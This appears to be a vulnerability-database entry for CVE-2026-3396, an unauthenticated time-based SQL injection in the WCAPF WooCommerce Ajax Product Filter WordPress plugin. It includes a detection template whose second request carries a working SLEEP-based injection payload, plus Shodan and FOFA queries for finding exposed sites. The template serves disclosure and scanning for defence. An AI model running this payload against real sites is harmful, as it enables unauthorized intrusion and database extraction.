WCAPF WooCommerce Ajax Product Filter - SQL Injection
CVE-2026-3396
Verified
Description
WCAPF WooCommerce Ajax Product Filter <= 4.2.3 contains a time-based SQL injection caused by insufficient escaping of the 'post-author' parameter, letting unauthenticated attackers extract sensitive database information remotely.
Severity
High
CVSS Score
7.5
Exploit Probability
1%
Published Date
April 14, 2026
Template Author
theamanrawat
CVE-2026-3396.yaml
id: CVE-2026-3396
info:
name: WCAPF WooCommerce Ajax Product Filter - SQL Injection
author: theamanrawat
severity: high
description: |
WCAPF WooCommerce Ajax Product Filter <= 4.2.3 contains a time-based SQL injection caused by insufficient escaping of the 'post-author' parameter, letting unauthenticated attackers extract sensitive database information remotely.
impact: |
Unauthenticated attackers can extract sensitive database information, potentially compromising data confidentiality.
remediation: |
Update to a version later than 4.2.3 or the latest available version.
reference:
- https://patchstack.com/database/vulnerability/wordpress-wcapf-woocommerce-ajax-product-filter-plugin-4-2-3-unauthenticated-time-based-sql-injection-vulnerability
- https://nvd.nist.gov/vuln/detail/CVE-2026-3396
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2026-3396
epss-score: 0.01473
epss-percentile: 0.70646
cwe-id: CWE-89
metadata:
verified: true
max-request: 2
shodan-query: 'http.html:"/wp-content/plugins/wc-ajax-product-filter/"'
fofa-query: 'body="/wp-content/plugins/wc-ajax-product-filter/"'
tags: sqli,wp-plugin,wc-ajax-product-filter,woocommerce,wordpress
flow: http(1) && http(2)
http:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/wc-ajax-product-filter/readme.txt"
matchers-condition: and
matchers:
- type: status
status:
- 200
internal: true
- type: word
words:
- "WCAPF"
- "WooCommerce Ajax Product Filter"
condition: and
internal: true
- method: GET
path:
- "{{BaseURL}}/shop/?filter_post_author=1%27%20AND%20SLEEP(6)%20AND%20%271%27%3D%271"
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'contains(body, "No results found")'
- 'status_code == 200'
condition: and
# digest: 4a0a0047304502210092f60dca789e4cbe54d6a09874e39df9e0b7a189308a44e9d59f6dc5d89703f9022045bd318bde0fd104cf0646cf7935ba31a82e45f80a221886f50218255a811606:922c64590222798bb761d5b6d8e729507.5Score
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CVE ID:
cve-2026-3396
CWE ID:
cwe-89
Remediation Steps
Update to a version later than 4.2.3 or the latest available version.